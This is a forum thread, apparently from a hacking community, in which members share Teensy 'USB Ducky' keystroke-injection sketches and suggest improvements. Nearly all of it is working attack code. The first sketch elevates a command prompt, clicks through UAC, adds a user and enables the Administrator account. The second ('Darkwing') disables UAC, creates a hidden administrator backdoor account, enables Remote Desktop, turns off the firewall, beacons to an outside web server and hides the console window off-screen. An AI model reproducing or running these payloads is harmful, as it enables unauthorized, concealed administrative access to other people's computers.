
OK guys, here is my first code. It's very basic and based on code by Benownzu93, so thank you.

what it does:

1) adds a new user

2) activates the true Administrator account and changes the password

3) then exits cmd

4) blinks when payload is finished

It works on Windows 7, but I can't get it to work properly on Vista.

On Vista the timing is all off, even though the delays I have set are long enough for all the commands to run successfully on Windows 7.

Thanks! I would love some feedback or ideas for things to add.

void setup() {
  // Let the host finish enumerating the HID keyboard before the first keystroke.
  delay(4000);

  // Open an elevated command prompt, then accept the UAC consent dialog.
  cmd();
  delay(1000);
  uac();
  delay(1000);

  // Every credential below is cleartext in the firmware and trivially
  // guessable; anyone who reads (or dumps) the sketch knows them.
  const char* add_user     = "net user MrDucky quackquack /add";
  const char* set_admin_pw = "net user administrator * ";
  const char* new_admin_pw = "Password";
  const char* enable_admin = "net user administrator /active:yes";

  // 1) Create a new local user.
  Keyboard.print(add_user);
  enter();
  delay(500);

  // 2) "net user <name> *" prompts for the password and then asks for it
  //    again; the password is typed twice to match.  The two delays below are
  //    the only thing keeping the typed text in step with the prompts -- if a
  //    prompt is late, the password is typed into the shell unmasked instead.
  Keyboard.print(set_admin_pw);
  enter();
  delay(500);
  Keyboard.print(new_admin_pw);
  enter();
  delay(200);
  Keyboard.print(new_admin_pw);
  enter();
  delay(500);

  // 3) Enable the built-in Administrator account.
  Keyboard.print(enable_admin);
  enter();
  delay(500);

  // 4) Close the prompt.
  Keyboard.print("exit");
  enter();
}

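void loop() {
  // Idle indicator once the payload in setup() has run: blink the on-board
  // LED with a random period.  Nothing in setup() configures the pin, so it
  // is done here -- the Arduino docs describe digitalWrite() on a pin still in
  // INPUT mode as toggling the pull-up rather than driving the pin, so the LED
  // is not guaranteed to light without this.
  pinMode(PIN_D6, OUTPUT);
  digitalWrite(PIN_D6, LOW);    // LED on (per the original comment; the other
                                // sketch on this page drives the pin HIGH to
                                // light it -- confirm polarity for your board)
  delay(random(1000));          // up to ~1 s so the blink looks irregular
  digitalWrite(PIN_D6, HIGH);   // LED off
  delay(random(1000));
}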
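void cmd(){
  // Open an elevated command prompt on Windows 7:
  //   Win key -> Start menu search box, type "cmd", Ctrl+Shift+Enter
  //   (= "Run as administrator").  The UAC consent dialog that follows is
  //   answered by uac().
  Keyboard.set_modifier(MODIFIERKEY_GUI);
  Keyboard.send_now();
  Keyboard.set_modifier(0);
  Keyboard.send_now();
  // Give the Start menu time to open and take keyboard focus.  The original
  // typed "cmd" immediately after releasing the Win key; keystrokes that
  // arrive before the search box has focus go to whatever window was focused
  // before.  That is the most likely cause of the reported "timing is off on
  // Vista" -- tune this delay first if the payload still misfires.
  delay(500);
  Keyboard.print("cmd");
  delay(700);
  // Ctrl+Shift+Enter: hold both modifiers with Enter down, then release the
  // modifiers, then release the key.
  Keyboard.set_modifier(MODIFIERKEY_CTRL | MODIFIERKEY_SHIFT);
  Keyboard.set_key1(KEY_ENTER);
  Keyboard.send_now();
  Keyboard.set_modifier(0);
  Keyboard.send_now();
  Keyboard.set_key1(0);
  Keyboard.send_now();
  delay(100);
}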
void uac(){
  // Answer the UAC consent dialog with its "Yes" accelerator (Alt+Y): one
  // report with Alt held and Y down, hold it briefly, then one report with
  // everything released.
  Keyboard.set_modifier(MODIFIERKEY_ALT);
  Keyboard.set_key1(KEY_Y);
  Keyboard.send_now();
  delay(100);
  Keyboard.set_key1(0);
  Keyboard.set_modifier(0);
  Keyboard.send_now();
}
void enter(){
  // Tap Enter: one report with the key down, then one with it released.
  const int enter_states[] = { KEY_ENTER, 0 };
  for (int i = 0; i < 2; i++) {
    Keyboard.set_key1(enter_states[i]);
    Keyboard.send_now();
  }
}

ok guys here is my first code its very basic and based on code by Benownzu93 so thank you

what it does:

1) adds a new user

2) activates the true Administrator account and changes the password

3) then exits cmd

4) blinks when payload is finished

...

Your code looks pretty good. I recommend that you create a library with the most commonly used commands so that you don't have to type the same thing over again. Have you looked at Irongeek's PHUKD library? It could save you some time and memory so that you can have Teensy do lots of other things.

http://www.irongeek.com/i.php?page=securit...y_PHUKD_library

It would be cool if you could also disable the firewall settings, or run some scripts that you have written for the Teensy. :) Good job on what you have so far!

Bits1


You're reinventing the wheel here! My code does the same thing (and more), and does it a bit more elegantly.

// Darkwing v0.1
// USB Ducky Framework for the Teensy 2.0
// by HaDAk
// for the Hak.5 Community -- please contribute, distribute, and credit!

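// Variables
int blinkcount = 0;   // counts the power-on blinks done in setup()

// The command strings are pointer-to-const: string literals are const in C++
// and the old `char*` declarations relied on a deprecated conversion.  They
// are only ever handed to Keyboard.print(), so nothing needs to write them.

// OS X payloads
const char* osx_ips = "ifconfig";

// *nix payloads
const char* nix_ips = "ifconfig";

// Windows Payloads
// Add user "backdoor" with password "p@$$w0rd", add it to the local
// Administrators group, and hide it from the welcome screen.  The credentials
// are cleartext in the firmware.  The UserList entry only hides the account
// from the logon UI; it is still visible to `net user` and other enumeration.
const char* win_adduser = "net user backdoor p@$$w0rd /add && REG ADD \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\" /V backdoor /T REG_DWORD /F /D \"0\" && net localgroup \"Administrators\" backdoor /ADD";
// Disable UAC.  EnableLUA is applied at logon/boot, so do not expect this to
// change the current session -- verify on the target before relying on it.
const char* win_disableuac = "REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\" /v EnableLUA /t REG_DWORD /d 0 /f";
// Enable Remote Desktop (no firewall rule is added for it; the next command
// simply turns the whole firewall off).
const char* win_enablerdp = "REG ADD \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f";
// Disable Windows Firewall via the legacy `netsh firewall` context; Vista and
// later also provide `netsh advfirewall`, which supersedes it.
const char* win_disablefirewall = "netsh firewall set opmode disable";
// Launch the default browser at a URL -- the author uses it to collect the
// target's IP and other system metrics.  As written this beacons every target
// to a third party's web server; point it at infrastructure you control.
const char* win_launchwebsite = "start /min www.hadak.org/pwnd-by-a-ducky";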
  
void setup() {
  // Two quick blinks at power-on so you can see the board is alive.
  for (; blinkcount < 2; blinkcount++) {
    blink(50);
  }

  // Wait for the host to enumerate the device before sending keystrokes.
  // 3000 ms is usually enough on Windows, but the very first plug-in also
  // installs drivers and takes much longer: plug the Ducky in once, let the
  // driver install finish, then unplug and replug it rather than inflating
  // this delay.  The right value varies per machine -- experiment.
  delay(3000);
  blink(50);

  // Elevated console, as small and quiet as cmd.exe allows (Vile's better
  // command line: http://www.hak5.org/forums/index.php?showtopic=16505).
  RunWinUACCommand("cmd /Q /D /T:7F /F:OFF /V:OFF /K \"@echo off && mode con:RATE=31 DELAY=0 && mode con:COLS=15 LINES=1 && title . && cls\"");
  //RunGnomeKDECommand("xterm");     // Linux (Gnome/KDE) console example
  //RunOSXCommand("Terminal.app");   // OS X console example

  delay(250);
  // Drag the console window off-screen so the typed commands are not visible.
  win_MoveWindow();

  // Windows payloads, in order: disable UAC, add the hidden admin user, enable
  // RDP, drop the firewall, beacon to the web server, then close the console.
  // There is no OS detection here: the Windows payload is always typed.
  const char* payloads[] = {
    win_disableuac,
    win_adduser,
    win_enablerdp,
    win_disablefirewall,
    win_launchwebsite,
    "exit"
  };
  const int payload_count = sizeof(payloads) / sizeof(payloads[0]);
  for (int i = 0; i < payload_count; i++) {
    Keyboard.print(payloads[i]);
    enter();
  }
}

void loop() {
  // After setup() has delivered the payload there is nothing left to type;
  // blink the LED slowly forever as a "done" indicator.
  const int done_blink_ms = 400;
  blink(done_blink_ms);
}

void blink(int time){
  // Flash the on-board LED once: HIGH (on) for `time` ms, then LOW (off) for
  // `time` ms.  pinMode() is re-applied on every call so blink() works no
  // matter what ran before it; it has nothing to do with brightness, despite
  // the comment in the original.
  pinMode(PIN_D6, OUTPUT);
  const int levels[] = { HIGH, LOW };
  for (int i = 0; i < 2; i++) {
    digitalWrite(PIN_D6, levels[i]);
    delay(time);
  }
}

void enter(){ // Tap the Enter key: a key-down report followed by a key-up report.
  Keyboard.set_key1(KEY_ENTER); Keyboard.send_now();   // press
  Keyboard.set_key1(0);         Keyboard.send_now();   // release
}

void RunGnomeKDECommand(char *cmd){
  // Alt+F2 opens the Gnome/KDE "Run command" dialog; wait for it, type the
  // command, and confirm with Enter.
  Keyboard.set_key1(KEY_F2);
  Keyboard.set_modifier(MODIFIERKEY_ALT);
  Keyboard.send_now();                  // Alt+F2 down
  Keyboard.set_key1(0);
  Keyboard.set_modifier(0);
  Keyboard.send_now();                  // everything released
  delay(500);                           // let the dialog appear and take focus
  Keyboard.print(cmd);
  enter();
}

void RunOSXCommand(char *cmd){
  // Cmd+Space (Spotlight on OS X): type the application name, pause for the
  // search to resolve, then Enter to launch the top hit.
  Keyboard.set_key1(KEY_SPACE);
  Keyboard.set_modifier(MODIFIERKEY_GUI);
  Keyboard.send_now();                  // Cmd+Space down
  Keyboard.set_key1(0);
  Keyboard.set_modifier(0);
  Keyboard.send_now();                  // everything released
  delay(500);                           // wait for the search field
  Keyboard.print(cmd);
  delay(500);                           // wait for the result to appear
  enter();
}

//void RunWindowsCommand(char *cmd){
//  Keyboard.set_modifier(MODIFIERKEY_GUI);
//  Keyboard.set_key1(KEY_R);
//  Keyboard.send_now();
//  Keyboard.set_modifier(0);
//  Keyboard.set_key1(0);
//  Keyboard.send_now();
//  delay(500);
//  Keyboard.print(cmd);
//  enter();
//}

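void RunWinUACCommand(const char *cmd){
  // Run `cmd` elevated on Windows: Win+R opens the Run dialog, Ctrl+Shift+Enter
  // submits it as "Run as administrator", and the UAC consent dialog is then
  // answered with Right arrow + Enter.
  //
  // Fix: the original called Keyboard.set_modifier(KEY_RIGHT) for the arrow
  // key.  KEY_RIGHT is a key code, not a modifier bit, so that report most
  // likely carried a bogus modifier byte and no key at all -- the Right-arrow
  // press was never delivered and only the trailing Enter reached the prompt.
  // The arrow is now sent through set_key1() like every other key.
  //
  // `cmd` is pointer-to-const (string literals are const); callers that pass
  // char* still compile.
  Keyboard.set_modifier(MODIFIERKEY_GUI);
  Keyboard.set_key1(KEY_R);
  Keyboard.send_now();                  // Win+R down
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();                  // released
  delay(50);                            // Run dialog -- short; tune per machine
  Keyboard.print(cmd);
  Keyboard.set_modifier(MODIFIERKEY_CTRL|MODIFIERKEY_SHIFT);
  Keyboard.send_now();                  // hold Ctrl+Shift ...
  enter();                              // ... and tap Enter = run as administrator
  Keyboard.set_modifier(0);
  Keyboard.send_now();                  // release the modifiers
  delay(500);                           // wait for the UAC consent dialog
  // Move focus to "Yes" and confirm.  This assumes the dialog's default button
  // is not "Yes" -- the first sketch on this page uses Alt+Y instead, which
  // does not depend on focus.
  Keyboard.set_key1(KEY_RIGHT);
  Keyboard.send_now();
  Keyboard.set_key1(0);
  Keyboard.send_now();
  enter();
}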

void win_MoveWindow(){
  // Push the focused console window off the bottom of the screen so the typed
  // payload is not visible: Alt+Space opens the window's system menu, "m"
  // picks Move (the English accelerator -- confirm on localized Windows),
  // 250 Down presses drag the window down, and Enter commits the move.
  Keyboard.set_modifier(MODIFIERKEY_ALT);
  Keyboard.set_key1(KEY_SPACE);
  Keyboard.send_now();                  // Alt+Space down
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();                  // released
  Keyboard.print("m");
  const int steps = 250;
  for (int step = 0; step < steps; step++) {
    Keyboard.set_key1(KEY_DOWN);
    Keyboard.send_now();
    Keyboard.set_key1(0);
    Keyboard.send_now();
  }
  enter();
}
